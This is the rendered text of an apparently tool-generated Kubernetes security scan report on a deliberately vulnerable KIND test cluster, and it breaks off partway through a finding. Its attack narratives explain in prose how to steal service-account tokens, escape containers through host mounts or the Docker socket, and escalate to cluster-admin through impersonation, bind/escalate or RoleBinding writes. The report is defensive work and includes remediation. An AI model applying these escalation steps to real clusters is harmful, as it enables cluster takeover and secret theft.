K
KubesplainingSecurity Report
v1.35.0 API https://127.0.0.1:43063 Snapshot 2026-05-04T13:52:13Z
Cluster reconnaissance 1 node2 cluster-admins0 LoadBalancers2 NetworkPolicies Click to expand
Cluster shape
Distributionv1.35.0
CloudKIND
API server 127.0.0.1 loopback
Nodes 1 1×amd64 · Debian GNU/Linux 12 (bookworm)
Kubeletv1.35.0 ×1
Runtimecontainerd://2.2.0 ×1
Inventory 11 namespaces · 21 pods · 62 service accounts
Who already owns this cluster
cluster-admin2 Group/kubeadm:cluster-admins ServiceAccount/rbac-fixtures/sa-cluster-admin
Wildcard verbs4 Group/kubeadm:cluster-admins Group/system:masters ServiceAccount/rbac-fixtures/sa-cluster-admin +1 more
Reads secrets11 Group/kubeadm:cluster-admins Group/system:masters ServiceAccount/kube-system/bootstrap-signer +8 more
Exposed surface
LoadBalancersnone
NodePort / extIP0 NodePort · 0 externalIP
HostNetwork pods7 kube-system/etcd-kubesplaining-e2e-control-plane kube-system/kindnet-fdcpf kube-system/kube-apiserver-kubesplaining-e2e-control-plane +4 more
Privileged pods3 kube-system/kube-proxy-rnj59 psa-suppressed/psa-priv-app-54c64bdd84-rggt6 vulnerable/risky-app-5879fbc5d8-7w424
Mutating webhooks 1
Guardrails
NetworkPolicies 2 across 2 namespaces 5 unprotected
Pod Security enforce=restricted ×1
Policy engines none
Default-SA pods 13 with token automount
Collection provenance
Permissions seen0 · missing 0
Warnings0
Namespaces scanned11
Duration0.0s
Executive summary

2 independent paths to full cluster takeover

97 findings across 4 chains. Concentration: 37 in rbac-fixtures, 33 in vulnerable.

What the attack paths mean. Individual findings don't tell the whole story. Attackers chain them. This report detected 4 attack chains by looking at how rule IDs, subjects, and resources connect. The attack-paths diagram below makes those connections explicit; each chain is walked through in plain English further down.
35
Critical
44
High
17
Medium
1
Low
Pod Security Admission: 2 pod-security findings suppressed because the workload's namespace carries a pod-security.kubernetes.io/enforce label that would block it at admission time. Run with --admission-mode=off to see every finding regardless of admission state, or --admission-mode=attenuate to keep them visible at reduced severity.
Suppressed findings by namespace
  • psa-suppressedKUBE-ESCAPE-001 ×1 — KUBE-PODSEC-APE-001 ×1
Risk index
100 / 100
CRITICAL
Weighted from 35 critical, 44 high, 17 medium, 1 low.
  • 4 attack chains detected
  • 37 findings in namespace rbac-fixtures
  • 6 findings on Deployment/vulnerable/risky-app
Think in graphs

Attack paths

critical edge high edge

Defenders look at findings as a list. Attackers chain them. This graph walks each entry point through the capability it grants to the impact it achieves, so a finding's real danger is the path it joins, not its individual score. Hover for context · click any node for a plain-language explainer.

Showing 10 of 33To keep the diagram readable, capabilities are capped at 10. The slate first guarantees one cap per impact category present in the cluster, then fills remaining slots by severity and score. The Findings tab has the complete list.

Entry point Abused capability Impact Entry point: Deployment risky-app. 2 critical/high findings on this entity. Deployment risky-app Deployment/vulnerable/risky-app 2 critical/high findings on this entity Entry point: Deployment socket-mounts-app. 1 critical/high on this entity. Deployment socket-mounts-app Deployment/vulnerable/socket-mounts-app 1 critical/high on this entity Entry point: ServiceAccount privileged-reader. 1 critical/high on this entity. ServiceAccount privileged-reader ServiceAccount/vulnerable/privileged- reader 1 critical/high on this entity Entry point: ServiceAccount sa-bind-escalate. 1 critical/high on this entity. ServiceAccount sa-bind-escalate ServiceAccount/rbac-fixtures/sa-bind- escalate 1 critical/high on this entity Entry point: ServiceAccount sa-cluster-admin. 1 critical/high on this entity. ServiceAccount sa-cluster-admin ServiceAccount/rbac-fixtures/sa- cluster-admin 1 critical/high on this entity Entry point: ServiceAccount sa-impersonate. 1 critical/high on this entity. ServiceAccount sa-impersonate ServiceAccount/rbac-fixtures/sa- impersonate 1 critical/high on this entity Entry point: ServiceAccount sa-nodes-proxy. 1 critical/high on this entity. ServiceAccount sa-nodes-proxy ServiceAccount/rbac-fixtures/sa-nodes- proxy 1 critical/high on this entity Entry point: ServiceAccount sa-rolebinding-mutate. 1 critical/high on this entity. ServiceAccount sa-rolebinding- mutate ServiceAccount/rbac-fixtures/sa- rolebinding-mutate 1 critical/high on this entity Entry point: MutatingWebhookConfiguration risky-ignore-webhook. 1 critical/high on this entity. MutatingWebhookConfiguration risky- ignore-webhook MutatingWebhookConfiguration/risky- ignore-webhook 1 critical/high on this entity Abused capability: KUBE-ESCAPE-005 — Docker socket mounted into Deployment/vulnerable/socket-mounts-app (volume docker-sock → /var/run/docker.sock) (severity CRITICAL) KUBE-ESCAPE-005 · score 10.0 Docker socket mounted into Deployment/ vulnerable/socket-mounts-app (volume docker- sock → /var/run/docker.sock) Abused capability: KUBE-ESCAPE-006 — Root filesystem (/) mounted from host into Deployment/vulnerable/risky-app (severity CRITICAL) KUBE-ESCAPE-006 · score 10.0 Root filesystem (/) mounted from host into Deployment/vulnerable/risky-app Abused capability: KUBE-PRIVESC-008 — Cluster-wide impersonate permission on ServiceAccount/rbac-fixtures/sa-impersonate (severity CRITICAL) KUBE-PRIVESC-008 · score 10.0 Cluster-wide impersonate permission on ServiceAccount/rbac-fixtures/sa-impersonate Abused capability: KUBE-PRIVESC-009 — Cluster-wide bind/escalate on roles bypasses RBAC (ServiceAccount/rbac-fixtures/sa-bind-escalate) (severity CRITICAL) KUBE-PRIVESC-009 · score 10.0 Cluster-wide bind/escalate on roles bypasses RBAC (ServiceAccount/rbac-fixtures/sa-bind- escalate) Abused capability: KUBE-PRIVESC-010 — Cluster-wide write access to (Cluster)RoleBindings opens a self-grant path (ServiceAccount/rbac-fixtures/sa-rolebinding-mutate) (severity CRITICAL) KUBE-PRIVESC-010 · score 10.0 Cluster-wide write access to (Cluster)RoleBindings opens a self-grant path (ServiceAccount/rbac-fixtures/sa- rolebinding-mutate) Abused capability: KUBE-PRIVESC-012 — get nodes/proxy enables kubelet exec via API server (ServiceAccount/rbac-fixtures/sa-nodes-proxy) (severity CRITICAL) KUBE-PRIVESC-012 · score 10.0 get nodes/proxy enables kubelet exec via API server (ServiceAccount/rbac-fixtures/sa- nodes-proxy) Abused capability: KUBE-PRIVESC-017 — Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-cluster-admin (severity CRITICAL) KUBE-PRIVESC-017 · score 10.0 Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-cluster-admin Abused capability: KUBE-PRIVESC-005 — Cluster-wide read access to Secrets on ServiceAccount/vulnerable/privileged-reader (severity HIGH) KUBE-PRIVESC-005 · score 10.0 Cluster-wide read access to Secrets on ServiceAccount/vulnerable/privileged-reader Abused capability: KUBE-ESCAPE-003 — Pod shares host network (hostNetwork: true) in Deployment/vulnerable/risky-app (severity HIGH) KUBE-ESCAPE-003 · score 8.1 Pod shares host network (hostNetwork: true) in Deployment/vulnerable/risky-app Abused capability: KUBE-ADMISSION-001 — MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local is fail-open (failurePolicy: Ignore) on security-critical resources (severity HIGH) KUBE-ADMISSION-001 · score 7.9 MutatingWebhookConfiguration risky-ignore- webhook/mutate.vulnerable.local is fail-open (failurePolicy: Ignore) on security-critical resources Impact: PRIVILEGE ESCALATION PRIVILEGE ESCALATION Impersonation, container escape, SA takeover Impact: LATERAL REACH LATERAL REACH Cross-namespace, node-local, egress Impact: DATA EXFILTRATION DATA EXFILTRATION Tokens, secrets, application data Impact: CONTROL BYPASS CONTROL BYPASS Admission, webhooks, API policies
Walkthroughs

Attack-chain narratives

Auto-detected from rule combinations in this scan. Each walks through, in attacker order, how the findings connect.

CRITICAL

Privileged workload → node root

  1. An attacker gains code execution in a workload co-scheduled with, or targeting, one of:
    • Deployment/vulnerable/host-ns-app
    • Deployment/vulnerable/risky-app
    • Deployment/vulnerable/socket-mounts-app
  2. The workload is configured to trust the host in one or more ways. Privileged mode grants all capabilities; a hostPath of / mounts the node's root filesystem; hostPID/hostIPC share the host's process and IPC namespaces.
  3. Any one of these alone is enough for a straightforward container escape: write into the host filesystem, exec through /proc/1, or interact with the kubelet's unix socket.
  4. From there, the attacker reads projected tokens for every other pod on the node and pivots into the cluster with those identities.
CRITICAL

Token theft → cluster-admin impersonation

  1. The attacker lands on a workload that mounts ServiceAccount/vulnerable/privileged-reader, or phishes a kubeconfig bound to it.
  2. That identity holds cluster-wide get/list on secrets, which includes service-account tokens in every namespace. The attacker lists kube-system secrets and reads tokens belonging to powerful controllers.
  3. Even without the token read, the same identity can create pods cluster-wide. The attacker schedules a pod that mounts the target service account, execs in, and acts as it.
  4. Either path converges on a cluster-admin-equivalent identity; all policies, secrets, and workloads are now under attacker control.
HIGH

Admission gap → silent enforcement bypass

  1. The webhook that should block dangerous pods fails open: failurePolicy: Ignore means any backend outage (or a targeted denial-of-service) silently disables enforcement for the window the attacker needs.
  2. Its namespace selector excludes at least one sensitive namespace, so workloads placed there skip admission entirely.
  3. The webhook keys off a workload-controlled label. Omit the label and admission doesn't apply.
  4. Any one of the above is a full bypass of the admission gate you thought was catching misconfigurations. In practice, this means every other chain in this report becomes easier to execute.
HIGH

Flat network → unrestricted lateral reach

  1. Namespaces with no NetworkPolicies treat every pod as reachable from every other pod. There is no default-deny, so a compromised workload can reach every service on every pod.
  2. An allow-from-all-namespaces policy is effectively no policy: traffic from any namespace matches, including attacker-controlled namespaces.
  3. Egress 0.0.0.0/0 gives the attacker free outbound reach. Stolen tokens, secrets, and staging data leave the cluster with nothing in the way.
  4. Combined, the attacker sweeps every pod in the cluster for vulnerable services and exfiltrates data without tripping a segmentation boundary.
Where the risk clusters

Severity × attack category

Critical High Medium Low
Module coverage

Findings by module

Risk hotspots

Resource × attack category

Cell color intensity = finding concentration. Rows sorted top-first by severity weight.

Resource
Priv. escalation
Lateral movement
Data exfil
Infra modification
Defense evasion
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
Findings index
Privesc 28 findings · 6 rules
RBAC 14 findings · 10 rules
Pod Security 32 findings · 13 rules
Service Accounts 8 findings · 4 rules
Network Policy 10 findings · 5 rules
Admission Webhooks 3 findings · 3 rules
Secrets & ConfigMaps 2 findings · 2 rules

Privesc

28 findings · 6 rules · 18 critical · 10 high · 0 medium · 0 low
CRITICAL

Subjects can reach cluster-admin equivalent in 1 hop(s)

KUBE-PRIVESC-PATH-CLUSTER-ADMIN 8 subjects Score 9.8–9.3
MITRE ATT&CK: T1078.004T1098T1068T1556

Affected subjects (8)

CRITICAL ServiceAccount/rbac-fixtures/sa-bind-escalate Cluster 9.8
ServiceAccount/rbac-fixtures/sa-bind-escalate can reach cluster-admin equivalent in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-bind-escalatecluster-admin equivalent: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-bind-escalate

Subject ServiceAccount/rbac-fixtures/sa-bind-escalate has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-bind-escalate/ via bind_or_escalate (bind,escalate roles|clusterroles): can bypass RBAC escalation checks via bind/escalate

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-bind-escalate (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-bind-escalate (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-bind-escalate, the attacker uses the RBAC bind/escalate bypass (bind,escalate roles|clusterroles) to grant themselves any role they choose, typically cluster-admin. bind/escalate is the carve-out that lets the holder escape RBAC's normal "you can only grant what you have" guardrail.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. RBAC bind/escalate bypass bind_or_escalate

    RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

    Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

    From ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted bind,escalate roles|clusterroles
    Gives the attacker can bypass RBAC escalation checks via bind/escalate
Remediation
Break the chain at the weakest hop: remove the bind,escalate roles|clusterroles capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-bind-escalate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the bind,escalate roles|clusterroles capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-bind-escalate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL ServiceAccount/rbac-fixtures/sa-cluster-admin Cluster 9.8
ServiceAccount/rbac-fixtures/sa-cluster-admin can reach cluster-admin equivalent in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-cluster-admincluster-admin equivalent: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-cluster-admin

Subject ServiceAccount/rbac-fixtures/sa-cluster-admin has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-cluster-admin/ via wildcard_permission (*:*:*): wildcard verbs on wildcard resources in wildcard API groups

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-cluster-admin (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-cluster-admin (RCE in any application using its identity, leaked token, or compromised image).
  2. The identity ServiceAccount/rbac-fixtures/sa-cluster-admin already holds wildcard verbs on wildcard resources (*:*:*), which is functionally identical to cluster-admin. The attacker can take any action on any resource in the cluster without further escalation.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Wildcard verbs × wildcard resources wildcard_permission

    An RBAC rule with verbs: ["*"], resources: ["*"], and apiGroups: ["*"] is functionally identical to cluster-admin, even if it isn't called that. Often introduced by careless Helm charts or "give it permission to everything until it works" debugging.

    From ServiceAccount/rbac-fixtures/sa-cluster-admin
    Permission granted *:*:*
    Gives the attacker wildcard verbs on wildcard resources in wildcard API groups
Remediation
Break the chain at the weakest hop: remove the permission *:*:* that enables the first hop (ServiceAccount/rbac-fixtures/sa-cluster-admin/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the permission *:*:* that enables the first hop (ServiceAccount/rbac-fixtures/sa-cluster-admin/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL ServiceAccount/rbac-fixtures/sa-impersonate Cluster 9.8
ServiceAccount/rbac-fixtures/sa-impersonate can reach cluster-admin equivalent in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-impersonatecluster-admin equivalent: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-impersonate

Subject ServiceAccount/rbac-fixtures/sa-impersonate has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-impersonate/ via impersonate (impersonate users|groups): can impersonate another identity

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-impersonate (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-impersonate (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker uses RBAC impersonation (the impersonate verb on impersonate users|groups) to send API requests as any identity in the cluster, including system:masters, which the apiserver hard-codes as cluster-admin. Granting impersonate on groups: ["*"] is functionally a cluster-admin grant.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. RBAC impersonation impersonate

    Kubernetes has a built-in "act as another user" feature: the impersonate verb on users, groups, or serviceaccounts. Anyone with that verb can submit requests as any identity, bypassing whatever permissions they don't have themselves.

    Granting impersonate on groups = ["*"] is equivalent to cluster-admin: the holder can impersonate system:masters.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate users|groups
    Gives the attacker can impersonate another identity
Remediation
Break the chain at the weakest hop: remove the impersonate users|groups capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the impersonate users|groups capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-impersonate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL ServiceAccount/rbac-fixtures/sa-rolebinding-mutate Cluster 9.8
ServiceAccount/rbac-fixtures/sa-rolebinding-mutate can reach cluster-admin equivalent in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-rolebinding-mutatecluster-admin equivalent: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-rolebinding-mutate

Subject ServiceAccount/rbac-fixtures/sa-rolebinding-mutate has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-rolebinding-mutate/ via modify_role_binding (create,update,patch rolebindings|clusterrolebindings): can create or mutate role bindings to grant itself any role

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-rolebinding-mutate (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-rolebinding-mutate (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-rolebinding-mutate, the attacker abuses RoleBinding write access (create,update,patch rolebindings|clusterrolebindings) to add themselves (or any subject they control) to a high-privilege ClusterRoleBinding, typically cluster-admin. They don't need the target role's permissions today, only the ability to change bindings.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. RoleBinding write access modify_role_binding

    create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

    Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

    From ServiceAccount/rbac-fixtures/sa-rolebinding-mutate
    Permission granted create,update,patch rolebindings|clusterrolebindings
    Gives the attacker can create or mutate role bindings to grant itself any role
Remediation
Break the chain at the weakest hop: remove the create,update,patch rolebindings|clusterrolebindings capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-rolebinding-mutate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the create,update,patch rolebindings|clusterrolebindings capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-rolebinding-mutate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL ServiceAccount/rbac-fixtures/sa-wildcard Cluster 9.8
ServiceAccount/rbac-fixtures/sa-wildcard can reach cluster-admin equivalent in 1 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-wildcardcluster-admin equivalent: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-wildcard

Subject ServiceAccount/rbac-fixtures/sa-wildcard has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 1 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-wildcard/ via wildcard_permission (*:*:*): wildcard verbs on wildcard resources in wildcard API groups

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-wildcard (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-wildcard (RCE in any application using its identity, leaked token, or compromised image).
  2. The identity ServiceAccount/rbac-fixtures/sa-wildcard already holds wildcard verbs on wildcard resources (*:*:*), which is functionally identical to cluster-admin. The attacker can take any action on any resource in the cluster without further escalation.
  3. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Wildcard verbs × wildcard resources wildcard_permission

    An RBAC rule with verbs: ["*"], resources: ["*"], and apiGroups: ["*"] is functionally identical to cluster-admin, even if it isn't called that. Often introduced by careless Helm charts or "give it permission to everything until it works" debugging.

    From ServiceAccount/rbac-fixtures/sa-wildcard
    Permission granted *:*:*
    Gives the attacker wildcard verbs on wildcard resources in wildcard API groups
Remediation
Break the chain at the weakest hop: remove the permission *:*:* that enables the first hop (ServiceAccount/rbac-fixtures/sa-wildcard/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the permission *:*:* that enables the first hop (ServiceAccount/rbac-fixtures/sa-wildcard/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL ServiceAccount/rbac-fixtures/sa-pod-create Cluster 9.3
ServiceAccount/rbac-fixtures/sa-pod-create can reach cluster-admin equivalent in 2 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-pod-createcluster-admin equivalent: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 2 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-fixtures/sa-bind-escalate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-bind-escalate
